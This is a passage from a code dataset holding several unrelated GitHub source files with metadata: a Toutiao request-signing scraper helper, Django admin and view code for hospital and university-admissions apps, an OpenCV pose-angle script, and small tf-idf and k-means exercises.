\"/usr/local/lib/node_modules/\"\n\n\ndef learn():\n with open('learn_js.js', 'r', encoding='utf-8') as f:\n js = f.read()\n\n js = execjs.compile(js)\n res = js.call('func', '123')\n\n print(res)\n\n\ndef sign2_run():\n url = 'https://www.toutiao.com/hot-event/hot-board/?origin=toutiao_pc'\n with open('sign2.js', 'r', encoding='utf-8') as f:\n js = f.read()\n\n js = execjs.compile(js)\n res = js.call('get_sign', url)\n print(res)\n\n\ndef main():\n sign2_run()\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "zyh364267040/spider-JS-APP", "sub_path": "jinritoutiao/learn_pyexecjs.py", "file_name": "learn_pyexecjs.py", "file_ext": "py", "file_size_in_byte": 626, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.environ", "line_number": 7, "usage_type": "attribute"}, {"api_name": "execjs.compile", "line_number": 14, "usage_type": "call"}, {"api_name": "execjs.compile", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "31505197653", "text": "from django.contrib import admin\nfrom django.contrib.contenttypes.admin import GenericTabularInline\n\nfrom sv_core.core.com.models import I18n\nfrom .models import Event, EventObject, EventType, Subscriber, EventRuleSet\n\n\nclass I18nInline(GenericTabularInline):\n model = I18n\n\n\nclass EventAdmin(admin.ModelAdmin):\n list_filter = ('event_type',)\n list_display = ('event_type', 'name')\n inlines = [\n I18nInline,\n ]\n\n\nclass EventTypeAdmin(admin.ModelAdmin):\n list_filter = ('event_type',)\n list_display = ('event_type', 'event_type_raw', 'entity_type')\n\n\nadmin.site.register(Event, EventAdmin)\nadmin.site.register(EventType, EventTypeAdmin)\nadmin.site.register(EventObject)\nadmin.site.register(Subscriber)\nadmin.site.register(EventRuleSet)\n", "repo_name": "ekryukov/sv_core", "sub_path": "sv_core/core/evt/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 763, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.contrib.contenttypes.admin.GenericTabularInline", "line_number": 8, "usage_type": "name"}, {"api_name": "sv_core.core.com.models.I18n", "line_number": 9, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 12, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 20, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 25, "usage_type": "call"}, {"api_name": "models.Event", "line_number": 25, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 25, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 26, "usage_type": "call"}, {"api_name": "models.EventType", "line_number": 26, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 26, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 27, "usage_type": "call"}, {"api_name": "models.EventObject", "line_number": 27, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 27, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 28, "usage_type": "call"}, {"api_name": "models.Subscriber", "line_number": 28, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 28, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 29, "usage_type": "call"}, {"api_name": "models.EventRuleSet", "line_number": 29, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 29, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "20115718644", "text": "import configparser\n\n\nclass SystemConfig:\n\n def __init__(self, log, config_path):\n self.config = configparser.ConfigParser()\n self.config.read(config_path, 'UTF-8')\n self.log = log\n\n def get_config(self, section, option=None):\n\n if not self.config.has_section(section):\n self.log.error(f'>> {section} is not found')\n return None\n\n if option is None:\n return True\n\n if self.config.has_option(section, option):\n return self.config.get(section, option)\n else:\n self.log.error(f'>> {option} is not found')\n return None\n", "repo_name": "krcc5978/upload_system", "sub_path": "project/system_config.py", "file_name": "system_config.py", "file_ext": "py", "file_size_in_byte": 636, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "configparser.ConfigParser", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "41816914453", "text": "import cv2\nimport PoseDetector as pd\nimport ImageOverlayer as io\nimport math\nimport time\nimport numpy as np\n\ndef GetJointAngle(CenterPos,jointPos1, jointPos2) :\n\n theta1=math.atan2((jointPos1[2]-CenterPos[2]), (jointPos1[1]-CenterPos[1]))\n theta2=math.atan2((jointPos2[2]-CenterPos[2]), (jointPos2[1]-CenterPos[1]))\n\n degree= abs(theta2-theta1)*180/math.pi\n\n return degree\n\ndef MatchTwoAngle(lmList): #두 영상으로 비교 예정...\n leftUpperBodyAngle={\"LelbowAngle\":[14,16,12],\"LarmpitAngle\":[12,14,24],\"LbodyAngle\":[12,11,24]}\n rightUpperBodyAngle={\"RelbowAngle\":[13,11,15],\"RarmpitAngle\":[11,13,23],\"RbodyAngle\":[11,12,23]}\n\n return False\n\ncap = cv2.VideoCapture(\"Shoulder_1.mp4\")\npTime = 0\ndetector = pd.PoseDetector()\n\nframeCount=cap.get(cv2.CAP_PROP_FRAME_COUNT)\n\nwhile True:\n cTime = time.time()\n success, img = cap.read()\n fps = 1 / (cTime - pTime)\n pTime = cTime\n\n if cap.get(cv2.CAP_PROP_POS_FRAMES) >= frameCount/3 : #현재 프레임 수를 확인 후, 지정된 프레임 이상일 시 동영상에서 스켈렙톤 뽑아내기\n img = detector.findPose(img)\n lmList = detector.findPosition(img)\n\n print(MatchTwoAngle(lmList))\n\n cv2.putText(img, str(int(fps)), (70, 50), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 0), 3)\n cv2.imshow(\"image\", img)\n cv2.waitKey(1)\n\n\n#real time\n#\n# webcam = cv2.VideoCapture(0)\n# personFrame = cv2.imread(\"PersonFrame.png\",cv2.IMREAD_UNCHANGED)\n# h,w,_=personFrame.shape\n#\n# overlay=io.ImageOverlayer()\n# if not webcam.isOpened() :\n# exit()\n#\n# while webcam.isOpened():\n# lmList=[]\n# detector = pd.PoseDetector()\n# status, frame = webcam.read()\n#\n# if not status :\n# webcam.waitKey()\n# break\n#\n# BackH,BackW,_=frame.shape\n# added_img=overlay.overlay_transparent(frame,personFrame,int(((BackW-1)/2)-((w-1)/2)),int(((BackH-1)/2)-((h-1)/2)))\n# img = detector.findPose(frame)\n# lmList = detector.findPosition(frame)\n#\n# cv2.imshow(\"frame\",added_img)\n#\n# if cv2.waitKey(10) & 0xFF == ord('q') :\n# break\n#\n# webcam.release()\n# cv2.destroyAllWindows()\n", "repo_name": "songsuyoung/UnityPortfolio", "sub_path": "PycharmProjects/pythonProject/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2131, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "math.atan2", "line_number": 10, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 11, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 13, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 23, "usage_type": "call"}, {"api_name": "PoseDetector.PoseDetector", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_FRAME_COUNT", "line_number": 27, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_POS_FRAMES", "line_number": 35, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_PLAIN", "line_number": 41, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "36949155015", "text": "from math import log10\nimport string\nfrom collections import Counter\nimport csv\n\n# Functions section\ndef tokenize(docs):\n \"\"\"\n Compute the tokens for each document.\n Input: a list of strings. Each item is a document to tokenize.\n Output: a list of lists. Each item is a list containing the tokens of the\n relative document.\n \"\"\"\n tokens = []\n for doc in docs:\n for punct in string.punctuation:\n doc = doc.replace(punct, \" \")\n split_doc = [ token.lower() for token in doc.split(\" \") if token ]\n tokens.append(split_doc)\n return tokens\n\ndef load_dataset(path)->tuple:\n \"\"\"\n Import the dataset as list of lists.\n Input: path to the file\n Output: dataset, header\n \"\"\"\n dataset = []\n\n with open(path) as f:\n header = f.readline()\n cr = csv.reader(f)\n for r,_ in cr:\n dataset.append(r)\n return header, dataset\n\n\n# Main section\nheader, dataset = load_dataset('reviews.txt')\ntokenized_docs = tokenize(dataset)\n\ntf = []\nfor doc in tokenized_docs:\n tf.append(dict(Counter(doc)))\nprint(tf[0])\n\ndfs={}\nfor row in tokenized_docs:\n local=[]\n for w in row:\n if dfs.get(w) != None:\n if w not in local:\n dfs[w]+=1\n local.append(w)\n else:\n dfs[w]=1\n local.append(w)\n\n\ndfs={k: v for k, v in sorted(dfs.items(), key=lambda item: item[1], reverse=True)}\nidfs = {k:log10(len(dataset)/v) for k,v in dfs.items()}\n\nwords_top = [(k,v) for k,v in idfs.items()]\nprint(words_top[:100])\ntfidf = []\nfor doc in tf:\n tfidf_elem = {}\n for k,v in doc.items():\n tfidf_elem[k] = v*idfs[k]\n tfidf.append(tfidf_elem)\n\n", "repo_name": "lambdavi/data_science_lab", "sub_path": "labs/lab2/es2.py", "file_name": "es2.py", "file_ext": "py", "file_size_in_byte": 1696, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "string.punctuation", "line_number": 16, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 32, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 44, "usage_type": "call"}, {"api_name": "math.log10", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "9237027872", "text": "import pandas as pd\nfrom sklearn.cluster import KMeans\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfields =['num_critic_for_reviews', 'duration','gross','facenumber_in_poster',\n 'budget','movie_facebook_likes','imdb_score']\ndf = pd.read_csv(\"movie_metadata.csv\", usecols=fields)\ndf.dropna(inplace=True)\ndf.reset_index(drop=True, inplace=True)\n# following tutorial:\n# https://towardsdatascience.com/k-means-clustering-with-scikit-learn-6b47a369a83c\nX = np.array([df['gross'],df['imdb_score']]).T\nkm = KMeans(n_clusters=3)\ny_km = km.fit_predict(X)\n\n\n# plot the 3 clusters\nfig = plt.figure()\nplt.xlabel(\"Gross revenue\")\nplt.ylabel(\"IMDB score\")\nplt.scatter(\n X[y_km == 0, 0], X[y_km == 0, 1],\n s=50, c='lightgreen',\n marker='s', edgecolor='black',\n label='cluster 1'\n)\nplt.scatter(\n X[y_km == 1, 0], X[y_km == 1, 1],\n s=50, c='orange',\n marker='o', edgecolor='black',\n label='cluster 2'\n)\nplt.scatter(\n X[y_km == 2, 0], X[y_km == 2, 1],\n s=50, c='lightblue',\n marker='v', edgecolor='black',\n label='cluster 3'\n)\n#plot the centroids\nplt.scatter(\n km.cluster_centers_[:, 0], km.cluster_centers_[:, 1],\n s=250, marker='*',\n c='red', edgecolor='black',\n label='centroids'\n)\nplt.legend(scatterpoints=1)\nplt.grid()\nplt.show()", "repo_name": "jam14j/BookScorePredictor", "sub_path": "clustering.py", "file_name": "clustering.py", "file_ext": "py", "file_size_in_byte": 1280, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pandas.read_csv", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 13, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}]} +{"seq_id": "7451927733", "text": "from django.shortcuts import render, redirect,reverse\nfrom Department.models import Department\nfrom django.http import JsonResponse\nfrom Staff.models import Doctor\nfrom Patient.forms import *\nfrom Patient.models import *\nfrom django.core.serializers import serialize\nfrom .models import *\nimport json\n\n\n# Create your views here.\n\n\ndef appointment_view(request):\n is_ajax = request.headers.get(\"X-Requested-With\") == \"XMLHttpRequest\"\n\n if is_ajax:\n if request.method == \"POST\":\n data = json.load(request)\n dept = data.get(\"payload\")\n doctor = Doctor.objects.filter(department__name=dept[\"dept\"])\n doclist = {}\n for i, data in enumerate(doctor):\n doclist[i] = data.profile.first_name\n doclist[\"len\"] = doctor.count()\n # print(serialize(queryset=doctor, format=\"json\"))\n\n return JsonResponse(doclist)\n if request.method == \"POST\":\n doctor = request.POST.get(\"doctor\")\n doc = doctor[doctor.index(\"Dr\")+3:]\n\n Appointment.objects.create(\n date = request.POST.get(\"date\"),\n phone_number = request.POST.get(\"phone\"),\n doctor = Doctor.objects.get(profile__first_name = doc),\n time = request.POST.get(\"time\"),\n message = request.POST.get(\"message\"),\n patient = Patient.objects.get_or_create(\n profile__first_name=request.POST.get(\"name\").split(\" \")[0])\n\n )\n #print(request.POST)\n\n department = Department.objects.all()\n form = AppointmentForm2()\n\n context = {\n \"departments\": department,\n \"form\":form\n }\n return render(request, \"appointment.html\", context)\n\n\ndef confirmation_view(request):\n return render(request, \"confirmation.html\")\n\ndef patient_page(request, id):\n patient = Patient.objects.get(id=id)\n appointments = patient.get_appointment_history()\n drug_prescription_list = DrugPrescription.objects.filter(patient_id=patient.id)\n lab_test_list = LabTest.objects.filter(patient_id=patient.id)\n context = {\n \"patient\": patient,\n \"appointments\": appointments,\n \"labtests\": lab_test_list,\n \"drugprescriptions\": drug_prescription_list\n }\n return render(request, \"patient-page.html\", context)\n\ndef DrugPrescriptionFormView(request, id):\n patient = Patient.objects.get(id=id)\n form = DrugPrescriptionForm()\n if request.method == \"POST\":\n form = DrugPrescriptionForm(request.POST)\n if form.is_valid():\n form.instance.prescribing_doctor = Doctor.objects.get(profile=request.user)\n form.instance.patient = patient\n form.instance.save()\n return redirect(reverse(\"patient-page\", kwargs = {\"id\":id}))\n context = {\n \"form\":form,\n \"patient\":patient\n }\n return render(request,\"drug_prescription_form.html\", context )\n\ndef LabTestFormView(request, id):\n patient = Patient.objects.get(id=id)\n form = LabTestForm()\n if request.method == \"POST\":\n form = LabTestForm(request.POST)\n if form.is_valid():\n form.instance.prescribing_doctor = Doctor.objects.get(profile=request.user)\n form.instance.patient = patient\n form.instance.save()\n return redirect(reverse(\"patient-page\", kwargs = {\"id\":id}))\n context = {\n \"form\":form,\n \"patient\":patient\n }\n return render(request,\"lab_test_form.html\", context )\n\ndef EntryFormView(request, id):\n form = EntryForm()\n patient = Patient.objects.get(id=id)\n if request.method == 'POST':\n form =EntryForm(request.POST)\n if form.is_valid():\n form.instance.patient = patient\n form.instance.save()\n return redirect(patient.get_absolute_url())\n\n context = {\n \"form\":form,\n \"patient\":patient\n\n }\n return render(request, \"entryform.html\", context)\n\ndef AppointmentFormView(request,id):\n form = AppointmentForm()\n patient = Patient.objects.get(id = id)\n doctor = Doctor.objects.get(profile_id = request.user)\n if request.method == \"POST\":\n form = AppointmentForm(request.POST)\n if form.is_valid():\n form.instance.doctor = doctor\n form.instance.patient = patient\n form.instance.phone_number = patient.phone_number\n form.instance.save()\n return redirect(patient.get_absolute_url())\n\n context = {\n \"form\":form,\n \"patient\":patient,\n }\n return render(request, \"appointment-form.html\", context)\n\ndef PatientPrescriptioListView(request, id):\n patient = Patient.objects.get(id=id)\n appointments = patient.get_appointments_history()\n drug_prescription_list = DrugPrescription.objects.filter(patient_id = patient.id)\n lab_test_list = LabTest.objects.filter(patient_id = patient.id)\n context = {\n \"patient\":patient,\n \"appointments\":appointments,\n \"labtests\":lab_test_list,\n \"drugprescriptions\":drug_prescription_list\n }\n return render(request, \"all_prescription_list.html\", context)\n\n\ndef AdmissionFormView(request,id):\n form = AdmissionForm()\n patient = Patient.objects.get(id = id)\n if request.method == \"POST\":\n form = AdmissionForm(request.POST)\n if form.is_valid():\n form.instance.patient = patient\n form.instance.save()\n return redirect(patient.get_absolute_url())\n\n context = {\n \"form\":form,\n \"patient\":patient,\n }\n return render(request, \"admission-form.html\", context)\n\ndef AppointmentListView(request, id):\n patient = Patient.objects.get(id=id)\n appointments = patient.get_appointment_history()\n context = {\n 'patient':patient,\n 'appointments':appointments\n }\n return render(request, 'appointmentlist.html', context)\n\ndef EntryListView(request, id, slug):\n patient = Patient.objects.get(id=id)\n entry = Entry.objects.filter(patient=patient, department__slug=slug)\n context = {\n 'patient':patient,\n 'entry':entry,\n }\n return render(request, 'entrylist.html', context)\n\n\ndef PatientLabTestListView(request, id):\n patient =Patient.objects.get(id = id)\n labtest = LabTest.objects.filter(testresult__isnull = False)\n\ndef AppointmentDetailView(request, id, slug):\n appointment = Appointment.objects.get(slug=slug)\n patient = Patient.objects.get(id = id)\n drug_prescription = DrugPrescription.objects.filter(appointment=appointment)\n labtest = LabTest.objects.filter(appointment=appointment)\n entry = Entry.objects.filter(appointment=appointment)\n context ={\n 'appointment':appointment,\n \"drugprescriptions\":drug_prescription,\n \"labtests\":labtest,\n \"entries\":entry,\n \"patient\":patient\n }\n return render(request, 'appointment-detail.html', context)\n\ndef patientProfile(request, id):\n patient = Patient.objects.get(id=id)\n context = {\n \"patient\":patient\n }\n return render(request, \"patient-profile.html\", context)", "repo_name": "DrAnonymousNet/HMS", "sub_path": "Patient/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7056, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "json.load", "line_number": 20, "usage_type": "call"}, {"api_name": "Staff.models.Doctor.objects.filter", "line_number": 22, "usage_type": "call"}, {"api_name": "Staff.models.Doctor.objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "Staff.models.Doctor", "line_number": 22, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 29, "usage_type": "call"}, {"api_name": "Staff.models.Doctor.objects.get", "line_number": 37, "usage_type": "call"}, {"api_name": "Staff.models.Doctor.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "Staff.models.Doctor", "line_number": 37, "usage_type": "name"}, {"api_name": "Patient.forms.objects.get_or_create", "line_number": 40, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 40, "usage_type": "name"}, {"api_name": "Department.models.Department.objects.all", "line_number": 46, "usage_type": "call"}, {"api_name": "Department.models.Department.objects", "line_number": 46, "usage_type": "attribute"}, {"api_name": "Department.models.Department", "line_number": 46, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 53, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 57, "usage_type": "call"}, {"api_name": "Patient.forms.objects.get", "line_number": 60, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 60, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 60, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 70, "usage_type": "call"}, {"api_name": "Patient.forms.objects.get", "line_number": 73, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 73, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 73, "usage_type": "name"}, {"api_name": "Staff.models.Doctor.objects.get", "line_number": 78, "usage_type": "call"}, {"api_name": "Staff.models.Doctor.objects", "line_number": 78, "usage_type": "attribute"}, {"api_name": "Staff.models.Doctor", "line_number": 78, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 81, "usage_type": "call"}, {"api_name": "django.shortcuts.reverse", "line_number": 81, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 86, "usage_type": "call"}, {"api_name": "Patient.forms.objects.get", "line_number": 89, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 89, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 89, "usage_type": "name"}, {"api_name": "Staff.models.Doctor.objects.get", "line_number": 94, "usage_type": "call"}, {"api_name": "Staff.models.Doctor.objects", "line_number": 94, "usage_type": "attribute"}, {"api_name": "Staff.models.Doctor", "line_number": 94, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 97, "usage_type": "call"}, {"api_name": "django.shortcuts.reverse", "line_number": 97, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 102, "usage_type": "call"}, {"api_name": "Patient.forms.objects.get", "line_number": 106, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 106, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 106, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 112, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 119, "usage_type": "call"}, {"api_name": "Patient.forms.objects.get", "line_number": 123, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 123, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 123, "usage_type": "name"}, {"api_name": "Staff.models.Doctor.objects.get", "line_number": 124, "usage_type": "call"}, {"api_name": "Staff.models.Doctor.objects", "line_number": 124, "usage_type": "attribute"}, {"api_name": "Staff.models.Doctor", "line_number": 124, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 132, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 138, "usage_type": "call"}, {"api_name": "Patient.forms.objects.get", "line_number": 141, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 141, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 141, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 151, "usage_type": "call"}, {"api_name": "Patient.forms.objects.get", "line_number": 156, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 156, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 156, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 162, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 168, "usage_type": "call"}, {"api_name": "Patient.forms.objects.get", "line_number": 171, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 171, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 171, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 177, "usage_type": "call"}, {"api_name": "Patient.forms.objects.get", "line_number": 180, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 180, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 180, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 186, "usage_type": "call"}, {"api_name": "Patient.forms.objects.get", "line_number": 190, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 190, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 190, "usage_type": "name"}, {"api_name": "Patient.forms.objects.get", "line_number": 195, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 195, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 195, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 206, "usage_type": "call"}, {"api_name": "Patient.forms.objects.get", "line_number": 209, "usage_type": "call"}, {"api_name": "Patient.forms.objects", "line_number": 209, "usage_type": "attribute"}, {"api_name": "Patient.forms", "line_number": 209, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 213, "usage_type": "call"}]} +{"seq_id": "2320572583", "text": "from django.http import HttpResponse\nfrom django.db.models import Count, Sum\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.urlresolvers import reverse\n\nfrom rest_framework import viewsets, generics, mixins\nfrom rest_framework.response import Response\n\nfrom .serializers import HighSchoolSerializer, HighSchoolWithResultsSerializer, PlanSerializer, SpecSerializer, OdcResultsBinsSerializer, GroupSerializer, SpecGroupSerializer, SearchResultSerializer, OdcResultsSerializer, ShortOdcResultsSerializer\nfrom .models import OdcInfoHighschool, OdcPlan, OdcInfoSpec, OdcInfoSpecGroup, OdcResults, OdcResultsBins, UserInfo, OdcPlanType, OdcInfoCommercialType, OdcInfoForm\nfrom .helpers import *\n\n\n# own views (not rest api)\n\n\n# index page\ndef index(request):\n ctx = {}\n return render(request, 'index.html')\n\n# one highschool page\ndef highschool(request, id):\n ctx = {}\n ctx['highschool'] = OdcInfoHighschool.objects.get(id=id)\n ctx['types'] = OdcPlanType.objects.all()\n ctx['selected_commercial_type'] = commercial = int(request.GET.get('commercial_type', 1))\n ctx['selected_plan_type'] = plan_type = int(request.GET.get('plan_type', 0))\n ctx['selected_form'] = form = int(request.GET.get('form', 1))\n\n ctx['selected_commercial_type_data'] = {}\n ctx['selected_plan_type_data'] = {}\n ctx['selected_form_data'] = {}\n\n user = request.user\n plans = OdcPlan.objects.select_related().filter(highschool_id=id)\n for plan in plans:\n ctx['selected_commercial_type_data'][plan.commercial_type.id] = plan.commercial_type\n ctx['selected_plan_type_data'][plan.plan_type.id] = plan.plan_type\n ctx['selected_form_data'][plan.form.id] = plan.form\n\n plans = plans.filter(commercial_type=commercial, plan_type=plan_type, form=form).order_by('spec_id')\n ctx['specs'] = []\n for plan in plans:\n p = {}\n p['plan'] = plan\n unit = get_user_units(request)\n p['user_points'] = count_user_points(unit, plan)\n p['all1'] = 0\n p['all2'] = 0\n p['good1'] = 0\n p['good2'] = 0\n\n results = OdcResults.objects.filter(spec_id=p['plan'].spec.id, highschool_id=id, result_type_id__in=(1,2), commercial_type=commercial, form=form)\n all_students = results.values('highschool_id', 'spec_id', 'result_type').annotate(count=Count('result_type'))\n for a in all_students:\n p['all' + str(a['result_type'])] = a['count']\n for a in all_students:\n for i in range(1,3):\n all_students = results.filter(highschool_id=id, spec_id = a['spec_id'], total__lte = p['user_points'], result_type_id=i).values_list('total')\n p['good'+str(i)] = len(all_students)\n if p['all'+str(i)] > 0:\n p['percent'+str(i)] = 100 * p['good'+str(i)] / p['all'+str(i)]\n else:\n p['percent'+str(i)] = 0\n\n ctx['specs'].append(p)\n\n return render(request, 'highschool.html', ctx)\n\n# search in highschools\ndef highschools_search(request):\n ctx = {}\n unit = set_user_units(request)\n\n specs = request.session['specs']\n if specs is not None and not specs == []:\n plans = OdcPlan.objects.select_related().filter(spec_id__in=specs, commercial_type=1, form=1)\n else:\n plans = OdcPlan.objects.select_related().filter(commercial_type=1, form=1)\n highschools_ids = plans.values('highschool_id').annotate(count=Count('highschool_id')).values_list('highschool_id', flat=True)\n highschools_info = OdcInfoHighschool.objects.filter(id__in=highschools_ids).values('name', 'raiting', 'id', 'website')\n if specs is None or specs == []:\n results = OdcResults.objects.filter(highschool_id__in=highschools_ids,result_type_id__in=(1,2), commercial_type=1, form=1)\n else:\n results = OdcResults.objects.filter(spec_id__in=specs, highschool_id__in=highschools_ids,result_type_id__in=(1,2), commercial_type=1, form=1)\n all_results = results.values('highschool_id', 'result_type', 'spec_id').annotate(count=Count('result_type'))\n\n final_results = {}\n points = {}\n\n for highschool in highschools_info:\n final_results[highschool['id']] = highschool\n final_results[highschool['id']]['specs'] = {}\n points = {}\n points['all1'] = 0\n points['all2'] = 0\n points['good1'] = 0\n points['good2'] = 0\n points['planned'] = 0\n points['min1'] = plans[0].min_sum_1\n points['min2'] = plans[0].min_sum_2\n final_results[highschool['id']]['points'] = points\n\n # считаем данные для ВУЗа в целом\n for plan in plans:\n spec_points = {}\n spec_points['plan'] = plan\n spec_points['all1'] = 0\n spec_points['all2'] = 0\n spec_points['good1'] = 0\n spec_points['good2'] = 0\n spec_points['user_points'] = count_user_points(unit, plan)\n\n final_results[plan.highschool_id]['points']['planned'] += plan.planned\n if plan.min_sum_1 and plan.min_sum_1 < 